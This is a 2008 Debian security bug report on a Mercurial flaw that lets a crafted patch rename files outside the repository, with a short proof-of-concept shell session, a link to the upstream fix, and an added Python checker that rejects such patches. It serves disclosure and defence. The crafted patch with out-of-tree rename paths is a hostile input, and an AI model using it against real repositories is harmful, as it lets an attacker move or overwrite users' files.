[Secure-testing-team] Bug#488628: mercurial: Insufficient input validation
Steffen Joeris
steffen.joeris at skolelinux.de
Mon Jun 30 07:42:05 UTC 2008
Package: mercurial
Severity: grave
Tags: security, patch
Justification: user security hole
Hi

It is possible to rename arbitrary files, even outside
the repository, by using a maliciously crafted patch.

Proof of concept:

echo quux > /tmp/foo
cat /tmp/foo /tmp/bar
quux
cat: /tmp/bar: No such file or directory
hg init hg-sandbox; cd hg-sandbox
hg import - <<EOF
> diff --git a/a b/b
> rename from /tmp/foo
> rename to /tmp/bar
> EOF
applying patch from stdin
/tmp/foo not tracked!
abort: /tmp/bar not under root
cat /tmp/foo /tmp/bar
cat: /tmp/foo: No such file or directory
quux

The issue has been fixed upstream[0].
Please upload with high urgency to make sure the fix reaches testing
soon.

Cheers
Steffen

[0]: http://www.selenic.com/hg/rev/87c704ac92d4
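
Added example, not part of the original report and not the upstream fix: a pre-flight check that scans a git-style patch for rename/copy header paths resolving outside the repository root, so the whole patch can be rejected before any file is touched (in the session above the file had already been moved by the time the abort was printed). The function names and the benign sample patch are assumptions made for illustration; only the rename and copy headers are covered.

```python
import os
import tempfile

# Git extended-header keywords whose argument is a file path.
PATH_HEADERS = ("rename from ", "rename to ", "copy from ", "copy to ")

# Constructed samples: the first is the patch from the report above.
POC_PATCH = "diff --git a/a b/b\nrename from /tmp/foo\nrename to /tmp/bar\n"
BENIGN_PATCH = "diff --git a/a b/b\nrename from a\nrename to sub/b\n"


def escapes_root(root, path):
    """Return True if path, resolved relative to root, lands outside root."""
    root = os.path.realpath(root)
    # os.path.join discards root when path is absolute, so "/tmp/foo" is
    # compared as-is; realpath also collapses ".." and follows symlinks.
    target = os.path.realpath(os.path.join(root, path))
    return os.path.commonpath([root, target]) != root


def unsafe_patch_paths(patch_text, root):
    """Return [(line_number, path)] for header paths that leave root."""
    bad = []
    for lineno, line in enumerate(patch_text.splitlines(), 1):
        for prefix in PATH_HEADERS:
            if line.startswith(prefix):
                path = line[len(prefix):]
                if escapes_root(root, path):
                    bad.append((lineno, path))
    return bad


if __name__ == "__main__":
    repo = tempfile.mkdtemp()  # stand-in for the repository root
    for name, patch in (("poc", POC_PATCH), ("benign", BENIGN_PATCH)):
        hits = unsafe_patch_paths(patch, repo)
        print(name, "REJECT" if hits else "ok", hits)
```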